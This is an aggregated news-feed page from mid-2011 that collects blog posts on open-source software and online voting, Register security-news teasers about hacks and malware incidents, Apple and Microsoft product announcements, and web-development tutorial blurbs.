I expect that it wouldn’t be hard for the developers to make it better; hopefully the GNOME folks will work to improve it. If many of GNOME 3’s problems are fixed, then I’ll be happy to try it again. But I’m in no hurry; XFCE works just fine.

I’m creating a new page on my website called Notes on Fedora so that I can record “how to” stuff, in case that others find it useful. For example, I’ve recorded how to turn on some stuff in XFCE to make it prettier. Enjoy!

Channel Image20:00 HTML Basics (linking an image)» scriptygoddess
I had a client ask me how to do the HTML to link an image to an email address. Figured I'd post my response here in case it can help others. It's basic stuff, but useful to some I guess! This is how you do the IMAGE HTML: <img src="PATH-TO-IMAGE-FILE-HERE" /> (so let's say your [...] No related posts. Related posts brought to you by Yet Another Related Posts Plugin.
Channel Image18:01 Upcoming FLOSS in Government Conferences for 2011» David A. Wheeler's Blog

If you’re interested in free/libre/open source software in government (particularly the U.S. federal government), there are two upcoming conferences you should consider.

One is Government Open Source Conference (GOSCON) 2011 on August 23, 2011. It will be held at the Washington Convention Center, Washington, DC.

The other is the Military Open Source Software (MIL-OSS) WG3 conference on August 30 - September 1, 2011. It will be held in Atlanta, Georgia.

I’ll be speaking at both. But don’t let that dissuade you :-).

Channel Image16:37 Twitter-control botnet mines Bitcoins» The Register - Security: Malware

Digital cash from chaos

Cybercrooks have begun using botnets of compromised machines to mine units of the Bitcoin virtual currency.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image13:03 State-sponsored 5-year global cyberattack uncovered» The Register - Security: Malware

Spy agency probably the real (cyber) slim shady

A five-year operation targeting more than 70 global companies, governments and non-profit organisations was probably the work of an intelligence agency, according to McAfee.…

Tue 02 August, 2011

Channel Image20:07 Malware attack spreads to 5 million pages (and counting)» The Register - Security: Malware

Unpatched sites turn on visitors

An attack that targets a popular online commerce application has infected almost 5 million webpages with scripts that attempt to install malware on their visitors' computers.…

Channel Image16:33 Evil Android Trojan records your calls» The Register - Security: Enterprise Security

Spy on the wire

Criminals have increased the functionality of Android Trojans with a new strain that is capable of recording, and not just logging, conversations on compromised smartphones.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image16:00 Using Scalar Functions for Retrieving Data» Dev Shed - Web Developer Tutorials
In this fifth part of a nine-part series on retrieving data from tables with the SELECT statement, you'll learn how to use scalar functions, and more. This article is excerpted from chapter three of the book Murach's Oracle SQL and PL/SQL, written by Joel Murach (Murach Publishing; ISBN: 9781890774509).
Channel Image12:15 Scareware scammers now phishing for punters» The Register - Security: Malware

Blocked credit card spam scam

Scareware scammers are targeting credit card users with a new run of spam emails falsely warning recipients that their plastic has been blocked.…

Mon 01 August, 2011

Channel Image17:55 Sneaky Trojan exploits e-commerce flaws» The Register - Security: Malware

Cache-probing, cookie-touching, self-deleting malware

More details have emerged of an e-commerce software flaw linked to the theft of credit card information from numerous websites.…

Channel Image14:48 Skype/Facebook integration spawns hijack risk» The Register - Security: Malware

Don't talk to strangers...

A bug involving the method Skype uses to integrate with Facebook creates a possible account-hijack risk, security watchers warn.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image12:16 Button brushes off 'car accident' website defacement to claim GP win» The Register - Security: Enterprise Security

#getsomefriends

F1 Driver Jenson Button brushed off an attack on his website late on Saturday night that falsely claimed he had been seriously injured in a car crash, and went on to win the Hungarian Grand Prix on Sunday.…

Channel Image04:28 PLCs a prison vulnerability: researchers» The Register - Security: Malware

Now there’s a jailbreak

Hard on the heels of warnings that critical systems in America are vulnerable to Stuxnet-style attacks, a group of security researchers says SCADA systems and PLCs make prisons vulnerable to computer-based attacks.…

Sat 30 July, 2011

Channel Image02:55 Anonymous hacks US gov contractor, airs dirty laundry» The Register - Security: Enterprise Security

Uses Mantech to wreak revenge on FBI

Members of the Anonymous hacking collective said they broke into the networks of Mantech International and stole internal documents belonging to the US government contractor.…

Fri 29 July, 2011

Channel Image21:16 Facebook dangles cash rewards for bug reports» The Register - Security: Enterprise Security

Microsoft, Oracle, you listening?

Facebook has joined Google and Mozilla in paying cash rewards to researchers who privately report vulnerabilities that could jeopardize the privacy or security of their users.…

Channel Image14:30 New App Store Rules Rile Users and Publishers» Dev Shed - Web Developer Tutorials
Apple has implemented some new App Store rules that have both users and publishers up in arms. What exactly are these new rules and how do they affect Apple's standing in the battle for control of the mobile app market? Read on to find out!
Channel Image13:38 Scumbags get sneaky with new self-robbery trojan» The Register - Security: Malware

Can't be bothered to steal your cash themselves

Malware-peddling scumbags have developed a particularly sneaky banking Trojan that attempts to trick victims into transferring funds into bank accounts controlled by cybercrooks or their partners.…

Channel Image12:40 Aussie ALDI withdraws infected greybox offering» The Register - Security: Malware

Multifunction hard drives hotching with Conficker

The Australian branch of supermarket chain ALDI has withdrawn a range of hard drives from its stores following the discovery that the hardware was infected with malware.…

Channel Image02:11 MacBook Air Sets New Notebook Standard» Apple Hot News
Reviewer Jim Dalrymple writes in The Loop that the new 13-inch MacBook Air combines all the capabilities required for doing day-to-day work with optimal screen size and resolution. Dalrymple also praises the device’s spacious keyboard, “amazing” battery life, and pre-installed OS X Lion. He concludes: “The 13-inch MacBook Air is the computer that all other laptops will be measured against. It has power, portability, and a sleek design that is only matched by other MacBooks.”

Thu 28 July, 2011

Channel Image16:01 Best AJAX Tutorials for Forms» Dev Shed - Web Developer Tutorials
This article highlights some of the best AJAX form tutorials available across the net.
Channel Image14:54 Nearly everyone in SOUTH KOREA HACKED IN ONE GO» The Register - Security: Enterprise Security

Local equivalent of Facebook hit: Fingers point at China

Personal information on as many as 35 million users of a South Korean social network site may have been exposed as the result of what has been described as the country's biggest ever hack attack.…

Channel Image14:30 Retrieving Data with String and Arithmatic Expressions» Dev Shed - Web Developer Tutorials
In this third part of a nine-part series on retrieving data from tables with the SELECT statement, you will learn how to code both string and arithmetic expressions. This article is excerpted from chapter three of the book Murach's Oracle SQL and PL/SQL, written by Joel Murach (Murach Publishing; ISBN: 9781890774509).
Channel Image14:28 Naughty JavaScript can be planted in IM status messages» The Register - Security: Malware

Technique shown for ICQ as well as Skype

Security shortcomings in both ICQ instant messenger for Windows and the ICQ website create a possible mechanism for account hijacking, a security researcher warns.…

Channel Image01:25 LiveJournal groans under 'immense' DDos attack» The Register - Security: Enterprise Security

Service disruptions for past 48 hours

LiveJournal is weathering a massive web attack that has meant service disruptions for people who read and write the more than 16 million journals hosted on the community and blogging service.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image01:08 'War texting' hacks car systems and possibly much more» The Register - Security: Enterprise Security

Remotely start cars, attack SCADA, through GSM

Software that allows drivers to remotely unlock and start automobiles using cell phones is vulnerable to hacks that allow attackers to do the same thing, sometimes from thousands of miles away, it was widely reported Wednesday.…

Wed 27 July, 2011

Channel Image19:17 SecurID breach cost RSA $66m» The Register - Security: Enterprise Security

In 2nd quarter alone

The security breach that targeted sensitive data relating to RSA's SecurID two-factor authentication product has cost parent company EMC $66m in the second quarter, The Washington Post has reported.…

Channel Image15:54 Military chip crypto cracked with power-analysis probe» The Register - Security: Enterprise Security

Akin to listening to safe tumblers, but with 'leccy

German computer scientists have taken advantage of the powerful number-crunching abilities of graphics chips to demonstrate a practical attack on the encryption scheme in programmable chips.…

Channel Image14:30 Simple and Secure PHP Login Script» Dev Shed - Web Developer Tutorials
This programming tutorial will teach you how to create a simple, yet secure login script utilizing PHP using MySQL and bracing for XSS attack prevention.

Tue 26 July, 2011

Channel Image15:57 BET24 warns over data breach – 19 months later» The Register - Security: Enterprise Security

Don't look back in anger, begs bookie

Update BET24.com warned customers on Monday that their personal data may have been exposed by a breach that took place in December 2009.…

Mon 25 July, 2011

Channel Image23:19 Head fed cyberspook resigns abruptly» The Register - Security: Enterprise Security

US-CERT director gives no reason for departure

The head of a group that helps the federal government ward off computer attacks abruptly resigned Friday, amid a spate of high-profile assaults hitting government agencies and contractors.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image16:36 Anonymous hacks Italy's critical-national-IT protection» The Register - Security: Enterprise Security

Evidently the protection isn't critical

Hacktivists have posted "secret documents" stolen from an Italian cybercrime unit.…

Channel Image03:30 Want to be more secure? Don’t be stupid» The Register - Security: Enterprise Security

Oz spooks outline unsurprising risk mitigation strategies

The best way to defend against most network vulnerabilities is to deal with the simplest attack vectors, according to Australia’s Defence Signals Directorate (DSD).…

Sat 23 July, 2011

Channel Image12:30 Cellular network hijacking for fun and profit» The Register - Security: Enterprise Security

The Reg cut-out-and-keep guide

Weekend Following the success of hijacked network Free Libyana, we took the opportunity to talk to some engineers about the complexity of lifting someone else's infrastructure, and discovered there isn't much.…

Fri 22 July, 2011

Channel Image16:03 Evil '666' auto-whaler tool is even eviler than it seems» The Register - Security: Malware

Robs the robbers who rob the robbers

Hackers have created a fake tool especially designed to exploit the laziness of the most clueless and unskilled phishing fraudsters.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image12:29 Pfizer's Facebook page jacked by script kiddies» The Register - Security: Enterprise Security

Viagra firm not hard enough to beat

Pharmaceutical giant Pfizer's Facebook page has been defaced by mischief makers.…

Channel Image10:56 Japanese judge jails serial malware author» The Register - Security: Malware

VXer riddled P2P with 'squid-octopus' download zapper

Japanese authorities have jailed a serial malware writer for two-and-a-half years over his latest creation.…

Channel Image10:00 Phishers target frequent flyer schemes in Brazil» The Register - Security: Enterprise Security

Phly-phishing phreebooters pillage air miles

Phishing fraudsters have latched on to a new target, with attacks designed to gain compromised access to frequent flyer accounts.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Thu 21 July, 2011

Channel Image16:06 LulzSec says it will partner with media on Murdoch emails» The Register - Security: Enterprise Security

Inspired by Assange™?

LulzSec has abandoned plans to release a cache of News International emails it claimed to have acquired during a redirection attack on The Sun website earlier this week. Instead the group says it plans to release select batches of the emails via a "partnership" with select media outlets, an approach akin to that applied by WikiLeaks to its controversial US diplomatic cable and war log releases last year.…

Channel Image11:00 Mounties charge Canadian IT guy over botnet scam» The Register - Security: Malware

Worldwide keylogger empire alleged

Canadian police have arrested a man accused of planting key-logging malware on hundreds of computers across the world.…

Wed 20 July, 2011

Channel Image19:45 Mac OS X Lion Available Today From the Mac App Store» Apple Hot News
Apple announced that Mac OS X Lion — the eighth major release of the world’s most advanced operating system — is available today as a download from the Mac App Store for $29.99. Lion offers more than 250 new features, including Multi-Touch gestures; systemwide support for full screen apps; Mission Control, a bird’s eye view of everything running on your Mac; Launchpad, a new home for all your apps; and a completely redesigned Mail app.
Channel Image19:44 New, Faster MacBook Air» Apple Hot News
Apple today updated the MacBook Air with next-generation Intel Core processors, high-speed Thunderbolt I/O technology, a backlit keyboard, and Mac OS X Lion, the world’s most advanced operating system. With up to 2.5x the performance of the previous generation, flash storage for instant-on responsiveness, and a compact design so portable you can take it everywhere, MacBook Air is the ultimate everyday notebook. MacBook Air starts at $999 (US) and is available for order today and in stores tomorrow.
Channel Image19:40 Apple Introduces World’s First Thunderbolt Display» Apple Hot News
Apple today unveiled the new Apple Thunderbolt Display, the world’s first display with Thunderbolt I/O technology and the ultimate docking station for your Mac notebook. With just a single cable, you can connect a Thunderbolt-enabled Mac to the 27-inch Apple Thunderbolt Display and access its FaceTime camera, high-quality audio, and Gigabit Ethernet, FireWire 800, USB 2.0, and Thunderbolt ports. The new display features a thin aluminum and glass enclosure and includes a MagSafe connector that charges your MacBook Pro or MacBook Air.
Channel Image19:34 Apple Updates Mac mini» Apple Hot News
Apple today updated the Mac mini with next-generation Intel Core processors, new discrete graphics, high-speed Thunderbolt I/O technology, and Lion, the world’s most advanced operating system. The new Mac mini delivers up to twice the processor and graphics performance of the previous generation in the same amazingly compact and efficient aluminum design. Starting at just $599 (US), the new Mac mini is available for order today and in stores tomorrow.
Channel Image16:16 Google sends warnings to machines with infected search» The Register - Security: Malware

Alerts are genuine - until scareware scum get on board

Google is issuing warnings to people whose computers are infected with a type of malware that manipulates search requests.…

Channel Image13:27 LulzSec hacker Sabu: Murdoch emails 'sometime soon'» The Register - Security: Enterprise Security

Secretive figure tells our man release is coming

The promised dump of its emails from News International by hacktivist group LulzSec failed to materialise on Tuesday. However a prominent affiliate of the group told El Reg that the release had only been delayed, rather than postponed.…

Channel Image12:41 Baidu apes Google with Chinese Chrome» The Register - Security: Enterprise Security

You want web stuff that works behind the Great Firewall?

Chinese search giant Baidu has launched its own web browser, aping Google's Chrome with web applications and aspirations of becoming a desktop replacement.…

Channel Image00:41 Apple Reports All-Time Record Revenue and Earnings» Apple Hot News
Apple today announced financial results for its fiscal 2011 third quarter ended June 25, 2011. The Company posted record quarterly revenue of $28.57 billion and record quarterly net profit of $7.31 billion, or $7.79 per diluted share. These results compare to revenue of $15.70 billion and net quarterly profit of $3.25 billion, or $3.51 per diluted share, in the year-ago quarter. “We’re thrilled to deliver our best quarter ever, with revenue up 82 percent and profits up 125 percent,” said Steve Jobs, Apple’s CEO. “Right now, we’re very focused and excited about bringing iOS 5 and iCloud to our users this fall.”

Tue 19 July, 2011

Channel Image15:30 LulzSec say they'll release big Murdoch email archive» The Register - Security: Enterprise Security

Rebekah Brooks apparently not a password genius

The hacktivists behind a hack on The Sun's website claim to have extracted an email archive which they plan to release later on Tuesday.…

Channel Image14:51 Popstar hackers snaffle Lady GaGa fans' email addresses» The Register - Security: Enterprise Security

Mutter about gayness in incomprehensible yoof jargon

Hackers claim to have broken into the UK fansite of Lady GaGa before extracting the names and email addresses of thousands of her fans.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image12:01 How LulzSec pwned The Sun» The Register - Security: Enterprise Security

'Walnut-faced Murdoch' prompts pranktivist encore

Infamous pranktivist hackers LulzSec exploited basic security mistakes on a News International website to redirect users towards a fake story on the supposed death of media mogul Rupert Murdoch, it has emerged.…

Channel Image01:11 Hacked Sun site greatly exaggerates Murdoch's death» The Register - Security: Enterprise Security

Sunday Times, other Murdoch sites, also down

Hackers breached the security of Rupert Murdoch's Sun website and briefly redirected many visitors to a hoax article falsely claiming the tabloid media tycoon had been found dead in his garden.…

Mon 18 July, 2011

Channel Image22:32 Microsoft turns screws on bot herders with hefty reward» The Register - Security: Malware

$250,000 for arrest of notorious Rustock operators

Microsoft is offering a $250,000 reward for information leading to the arrest of those who controlled Rustock, a recently dismantled botnet that in its heyday was one of the biggest sources of illegal spam.…

Channel Image11:51 Tosh admits customer accounts pillaged» The Register - Security: Enterprise Security

Everything but credit card details snaffled

Toshiba says that unidentified hackers have stolen customer records belonging to 7,500 of its customers.…

Fri 15 July, 2011

Channel Image17:04 0day vulnerabilities fall but critical bugs grow» The Register - Security: Enterprise Security

Enterprises advised to apply security triage

Almost half the security bugs chronicled by Secunia in the last year were not covered by a patch at the time of their publication.…

Channel Image14:24 US forced to redesign secret weapon after cyber breach» The Register - Security: Enterprise Security

'Cyber Pilot' called in following backdoor penetration

The United States may be forced to redesign an unnamed new weapon system now under development – because tech specs and plans were stolen from a defence contractor's databases.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image12:00 Romanian NASA hacker fights 'inflated' damage assessment» The Register - Security: Enterprise Security

SirVic reluctant to stump $240k for digi-vandalism

A Romanian accused of hacking NASA is fighting against an order to pay damages to the space agency.…

Thu 14 July, 2011

Channel Image21:56 Microsoft, co-author of the Linux kernel» David A. Wheeler's Blog

Truth is often stranger than fiction. Microsoft was the fifth-largest corporate contributor to the Linux kernel version 3.0.0, as measured by the number of changes to its previous release. Only Red Hat, Intel, Novell, and IBM had more contributions. Microsoft was #15 as measured by number of lines changed, which is smaller but is still an impressively large number.

This work by Microsoft was to clean up the “Microsoft Hyper-V (HV) driver” so that the Microsoft driver would be included in the mainline Linux kernel. Microsoft originally submitted this set of code changes back in July 2009, but there were a lot of problems with it, and the Linux kernel developers insisted that it be fixed. The Linux community had a long list of issues with Microsoft’s code, but the good news is that Microsoft worked to improve the quality of its code so that it could be accepted into the Linux kernel. Other developers helped Microsoft get their code up to par, too. ( Steve Friedl has some comments about its early technical issues.) There’s something rather amusing about watching Microsoft (a company that focuses on software development) being forced by the Linux community to improve the quality of Microsoft’s code. Anyone who thinks that FLOSS projects (which typically use widespread public peer review) always produce lower quality software than proprietary vendors just isn’t watching the real world (see my survey paper of quantitative FLOSS studies if you want more on that point). Peer review often exposes problems, so that they can be fixed, and that is what happened here.

Microsoft did not do this for the sheer thrill of it. Getting code into the mainline Linux kernel release, instead of just existing as a separate patch, is vitally important for an organization if they want people to use their software (if it needs to be part of the Linux kernel, as this did). A counter-example is that the Xen developers let KVM zoom ahead of them, because the Xen developers failed to set a high priority on getting full support for Xen into the mainline Linux kernel. As Thorsten Leemhuis at The H says, “There are many indications that the Xen developers should have put more effort into merging Xen support into the official kernel earlier. After all, while Xen was giving developers and distribution users a hard time with the old kernel, a new virtualisation star was rising on the open source horizon: KVM (Kernel-based Virtual Machine)… In the beginning, KVM could not touch the functional scope and speed of Xen. But soon, open source developers, Linux distributors, and companies such as AMD, Intel and IBM became interested in KVM and contributed a number of improvements, so that KVM quickly caught up and even moved past Xen in some respects.” Xen may do well in the future, but this is still a cautionary tale.

This doesn’t mean that Microsoft is suddenly releasing all its programs as free/libre/open source software (FLOSS). Far from it. It is obvious to me that Microsoft is contributing this code for the same reason many companies contribute to the Linux kernel and other FLOSS software projects: Money.

I think it is clear that Microsoft hopes that these changes to Linux will help Microsoft sell more Windows licenses. These changes enable Linux to run much better (e.g., more efficiently) on top of Microsoft Windows’ hypervisor (Hyper-V). Without them, people who want to run Linux on top of a hypervisor are much more likely to use products other than Microsoft’s. Microsoft doesn’t want to be at a competitive disadvantage in this market, so to sell its product, it chose to contribute changes to the Linux kernel. With this change, Microsoft Windows becomes a more viable option as a host operating system, running Linux as a guest.

Is this a big change? In some ways it is not. Microsoft has developed a number of FLOSS packages, such as WiX (for installing software on Windows), and it does all it can to encourage the development of FLOSS that run on Windows.

Still, it’s something of a change for Microsoft. Microsoft CEO Steve Ballmer stated in 2001 that Linux and the GNU GPL license were “a cancer”. This was in many ways an attack on FLOSS in general; the GNU GPL is the most popular FLOSS license by far, and a MITRE report found that the “GPL sufficiently dominates in DoD applications for a ban on GPL to closely approximate a full ban of all [FLOSS]”. This would have been disastrous for their customer, because MITRE found that FLOSS software “plays a far more critical role in the [Department of Defense] than has been generally recognized”. I think many other organizations would say the same. This is not even the first time Microsoft has gotten involved with the GPL. Microsoft sold Windows Services for Unix (SFU), which had GPL software, showing that even Microsoft understood that it was possible to make money while using the GPL license. But this more case is far more extreme; in this case Microsoft is actively helping a product (the Linux kernel) that it also competes with. I don’t expect Microsoft to keep contributing significantly to the Linux kernel, at least for a while, but that doesn’t matter; here we see that cash trumps ideology. More generally, this beautifully illustrates collaborative development: Anyone can choose to work on specific areas of a FLOSS program, for their own specific or selfish reasons, to co-produce works that help us all.

Channel Image13:06 MAJOR HACK: Voda femtocells open phones up to intercept» The Register - Security: Enterprise Security

Pass within 50m of one, they own your phone

Updated Security researchers claim to have uncovered a serious security hole in Vodafone's mobile network.…

Channel Image10:30 Most Adobe Reader installs are out of date» The Register - Security: Malware

Patchy patching leaves pdf backdoors open to intrusion

Six out of every 10 users of Adobe Reader are running vulnerable versions of the ubiquitous PDF reader package, according to stats from freebie anti-virus scanner firm Avast.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image09:43 Sega forums still closed a month after mystery hack» The Register - Security: Enterprise Security

Digital pillage leaves lasting damage

Sega's forum remains offline almost a month after its forums and other sites were hit by hacktivists.…

Wed 13 July, 2011

Channel Image12:19 Anonymous spaffs Monsanto employees' details» The Register - Security: Enterprise Security

Targets Canadian oil sands for 'Tarmageddon', too

Anonymous has latched onto yet another new target with the release of potentially sensitive data from controversial agricultural giant Monsanto.…

Channel Image08:22 Windows Intune 2.0 beta Now Available» Bink.nu

You can go to Windows Intune Springboard site for information on signing up for your beta subscription. Once you have completed the sign-up process and activated your account, you can go to https://beta.manage.microsoft.com to begin evaluating the beta. A beta subscription will allow you to deploy to up to 10 PCs, which should allow you to evaluate the improvements we’ve made.

Here are the highlights of what’s new:

Software Distribution

  • Package applications, upload them to the cloud for distribution, and deploy them to your Windows Intune-managed PCs. For the beta we have provided 2 gigs of storage for this purpose. Packages can be normal applications in the form of MSIs or EXEs or third party updates. Deploying packages leverages BITS to ensure data transfer is efficient.

Better Hardware Reporting and Filters

  • We do a great job of collecting hardware data, but we want to ensure we also present this information in a way that is most useful to you. To assist with this, we have introduced the hardware dashboard along with reports, which will help you view and export your hardware more easily.

Third Party License Management

  • Upload and track your 3rd party and Microsoft retail or OEM license agreements - in addition to Microsoft Volume License Agreements – all in one place.

User Interface Enhancements

  • Many new enhancements have been made to the user experience. In general, we made numerous changes to improve navigability. We are also introducing the ability to right-click, which will display a list of context-sensitive actions you can perform. We have also added a new administrator role, so you can now have ‘read-only’ administrators.

Remote Actions

  • Execute a number of tasks on remote unattended PCs. You can invoke malware definitions to install, you can initiate a malware scan to run immediately, and you can remotely reboot a PC.

Improvements to Alerts Workspace

  • We’ve introduced the ability to configure thresholds on alerts so you can filter out less important events, and focus on the ones that matter to you. We also improved the way you set up recipients for these alerts.

Support for images

  • The Windows Intune client is ‘image-friendly’ and can be set up prior to image deployment. Previously, the Windows Intune client required an internet connection before it could install.
Windows Intune beta Now Available - The Windows Intune Team Blog - Site Home - TechNet Blogs


Tue 12 July, 2011

Channel Image23:05 Outlook Hotmail Connector now with HTTPS support» Bink.nu
With Microsoft Outlook Hotmail Connector 64-bit, you can use Microsoft Office Outlook 2010 64-bit to access and manage your Microsoft Windows Live Hotmail or Microsoft Office Live Mail accounts, including e-mail messages, contacts and calendars for free!

Note: This latest update (14.0.6106.5001) includes several stability and reliability fixes and supports the HTTPS protocol for all communication between Microsoft Outlook and Windows Live Hotmail, Calendar and Contacts.
With Microsoft Outlook Hotmail Connector 32-bit, you can use Microsoft Office Outlook 2003, Microsoft Office Outlook 2007 or Microsoft Office Outlook 2010 to access and manage your Microsoft Windows Live Hotmail or Microsoft Office Live Mail accounts, including e-mail messages, contacts and calendars for free!
Outlook Hotmail Connector enables you to use your Live Hotmail accounts within Outlook:

  • Read and send your Office Live Mail/Windows Live Hotmail e-mail messages.
  • Manage your contacts in Windows Live Hotmail..
  • Use advanced options for blocking junk e-mail messages.
  • Manage multiple e-mail accounts in one place.
  • Manage, and synchronize multiple calendars, including shared calendars to Windows Live Calendar from Outlook.
If you use the Outlook Hotmail Connector with Outlook 2010 you gain these additional benefits:
  • Your Safe Sender List/Blocked sender list/Safe Recipient lists are synchronized between Outlook and Hotmail.
  • Send/receive works like your other Outlook accounts.
  • Your Hotmail account status appears in the Outlook status bar.
  • Rules work with the Hotmail account in Outlook even if it’s not your primary account.
 
 
 


Channel Image23:01 Microsoft® SQL Server® 2008 R2 Service Pack 1» Bink.nu

Files in this download

The links in this section correspond to files available for this download. Download the files appropriate for you.

File Name Size
SQLManagementStudio_x64_ENU.exe 155.0 MB Download
SQLManagementStudio_x86_ENU.exe 153.0 MB Download
SQLServer2008R2SP1-KB2528583-IA64-ENU.exe 296.0 MB Download
SQLServer2008R2SP1-KB2528583-x64-ENU.exe 309.0 MB Download
SQLServer2008R2SP1-KB2528583-x86-ENU.exe 201.0 MB Download

What’s New in SQL Server 2008 R2 Service Pack 1 ?

  • Dynamic Management Views for increased supportability:
      sys.dm_exec_query_stats DMV is extended with additional columns to improve supportabilities over troubleshooting long-running queries. New DMVs and XEvents on select performance counters are introduced to monitor OS configurations and resource conditions related to the SQL Server instance.
  • ForceSeek for improved querying performance :
      Syntax for FORCESEEK index hint has been modified to take optional parameters allowing it to control the access method on the index even further. Using old style syntax for FORCESEEK remains unmodified and works as before. In addition to that, a new query hint, FORCESCAN has been added. It complements the FORCESEEK hint allowing specifying ‘scan’ as the access method to the index. No changes to applications are necessary if you do not plan to use this new functionality.
  • Data-tier Application Component Framework (DAC Fx) for improved database upgrades:
      The new Data-tier Application (DAC) Framework v1.1 and DAC upgrade wizard enable the new in-place upgrade service for database schema management. The new in-place upgrade service will upgrade the schema for an existing database in SQL Azure and the versions of SQL Server supported by DAC. A DAC is an entity that contains all of the database objects and instance objects used by an application. A DAC provides a single unit for authoring, deploying, and managing the data-tier objects. For more information, see Designing and Implementing Data-tier Applications.
  • Disk space control for PowerPivot:
      This update introduces two new configuration settings that let you determine how long cached data stays in the system. In the new Disk Cache section on the PowerPivot configuration page, you can specify how long an inactive database remains in memory before it is unloaded. You can also limit how long a cached file is kept on disk before it is deleted.
  • Fixed various issues:
    For a detailed list of new features and improvements that are included in SQL Server 2008 R2 SP1, review the What's New Section in Release Notes.

  • Channel Image15:08 'Meltdown Monday' Anonymous hackers leak military mails» The Register - Security: Enterprise Security

    AntiSec hacktivists blasted for breaking own manifesto

    Anonymous uploaded 90,000 military email address and associated password hashes onto a file-sharing network on Monday as part of an operation it christening Military Meltdown Monday.…

    Free Whitepaper: Implementing Energy Efficient Data Centers

    Mon 11 July, 2011

    Channel Image13:49 MS security centre search poisoned with infectious smut» The Register - Security: Malware

    Chapeau-noir SEOs seed results with seediness

    Microsoft has disabled the search results on its Security Centre after malware-spreaders abused the function to promote shady pornographic websites serving Trojans as well as cheap thrills.…

    Channel Image12:00 How scareware scumbags avoid getting flagged by banks» The Register - Security: Malware

    White hats infiltrate, monitor three networks

    A study of cybercrime economics shows that peddlers of rogue antivirus scams rely on legitimate banks to run their businesses, carefully ensuring that the volume of chargebacks they incur stay just on the right side of being flagged-up as obviously fraudulent.…

    Fri 08 July, 2011

    Channel Image14:03 Portuguese hackers strike back at Moody's downgrade» The Register - Security: Enterprise Security

    Sub prime dishonour

    Portuguese hackers responded to a negative assessment of the country's ability to repay loans by defacing the website of credit reference agency Moody's.…

    Channel Image10:49 Solitary critical Windows update to star in modest Patch Tuesday» The Register - Security: Malware

    Four square

    Microsoft is to issue four bulletins next Tuesday – one of which is critical – as part of the July edition of its Patch Tuesday update cycle.…

    Thu 07 July, 2011

    Channel Image13:16 Feds cuff programmer in alleged trading-ware theft» The Register - Security: Enterprise Security

    Say Chinese-born Chicago coder had flight booked

    Chunlai Yang, a 49-year old Chinese-born American, has been charged with stealing proprietary software code.…

    Channel Image12:43 Only jailbroken iPhones, iPads can be safe from latest vuln» The Register - Security: Malware

    iUsers with unmeddled tech must wait for Apple patch

    The latest jailbreak for iPhones, published on Wednesday, exploits a zero-day bug in iOS that only users of jailbroken devices will be able to fix, security experts warn.…

    Channel Image12:18 Rustock zombies halved as clean-up efforts continue» The Register - Security: Malware

    Leaderless undead remotely brain-shot from Redmond

    The zombie machines which formerly powered the infamous Rustock botnet are down to half their original number, according to Microsoft.…

    Free Whitepaper: Implementing Energy Efficient Data Centers

    Wed 06 July, 2011

    Channel Image19:32 Yet again, why banking online .NE. voting online» Freedom to Tinker

    One of the most common questions I get is “if I can bank online, why can’t I vote online”. A recently released (but undated) document ”Supplement to Authentication in an Internet Banking Environment” from the Federal Financial Institutions Examination Council addresses some of the risks of online banking. Krebs on Security has a nice writeup of the issues, noting that the guidelines call for 'layered security
    programs' to deal with these riskier transactions, such as:

    1. methods for detecting transaction anomalies;

    2. dual transaction authorization through different access devices;

    3. the use of out-of-band verification for transactions;

    4. the use of 'positive pay' and debit blocks to appropriately limit
      the transactional use of an account;

    5. 'enhanced controls over account activities,' such as transaction
      value thresholds, payment recipients, the number of transactions
      allowed per day and allowable payment days and times; and

    6. ’enhanced customer education to increase awareness of the fraud
      risk and effective techniques customers can use to mitigate the
      risk.'

    [I've replaced bullets with numbers in Krebs’ posting in the above list to make it
    easier to reference below.]

    So what does this have to do with voting? Well, if you look at them
    in turn and consider how you'd apply them to a voting system:

    1. One could hypothesize doing this - if 90% of the people in a
      precinct vote R or D, that's not a good sign - but too late to do
      much. Suggesting that there be personalized anomaly detectors (e.g.,
      "you usually vote R but it looks like you're voting D today, are you
      sure?") would not be well received by most voters!

    2. This is the focus of a lot of work – but it increases the effort for the voter.

    3. Same as #2. But have to be careful that we don't make it too hard
      for the voter! See for example SpeakUp: Remote Unsupervised Voting as an example of how this might be done.

    4. I don't see how that would apply to voting, although in places like Estonia where you’re allowed to vote more than once (but only the last vote counts) one could imagine limiting the number of votes that can be cast by one ID. Limiting the number of votes from a single IP address is a natural application – but since many ISPs use the same (or a few) IP addresses for all of their customers thanks to NAT, this would disenfranchise their customers.

    5. “You don't usually vote in primaries, so we're not going to let you
      vote in this one either." Yeah, right!

    6. This is about the only one that could help - and try doing it on
      the budget of an election office!

    Unsaid, but of course implied by the financial industry list is that the goal is to reduce fraud to a manageable level. I’ve heard that 1% to 2% of the online banking transactions are fraudulent, and at that level it’s clearly not putting banks out of business (judging by profit numbers). However, whether we can accept as high a level of fraud in voting as in banking is another question.

    None of this is to criticize the financial industry’s efforts to improve security! Rather, it’s to point out that try as we might, just because we can bank online doesn’t mean we should vote online.

    Channel Image18:00 Coming Soon: Microsoft PST Capture Tool» Bink.nu

    Exchange Team Blog: We're excited to announce that later this year we'll be adding a new tool to our already rich portfolio of planning and deployment tools. This new tool, PST Capture, will be downloadable and free, and will enable you to discover .pst files on your network and then import them into both Exchange Online (in Office 365) and Exchange Server 2010 on-premises. PST Capture will be available later this year. It doesn’t replace the New-MailboxImportRequest cmdlet that exists already for importing known .pst files into Exchange Server, but instead works in parallel to enable you to embark on a systematic search and destroy mission to rid yourself of the dreaded .pst scourge.

     

    Coming Soon PST Capture Tool - Exchange Team Blog - Site Home - TechNet Blogs


    Tue 05 July, 2011

    Channel Image13:23 Popular FTP package download tarball poisoned» The Register - Security: Malware

    'Someone having a few lulz', suggests author

    A backdoor has been discovered in the source code of a widely used FTP package.…

    Mon 04 July, 2011

    Channel Image20:54 U.S. government must balance its budget» David A. Wheeler's Blog

    (This is a blog entry for U.S. citizens — everyone else can ignore it.)

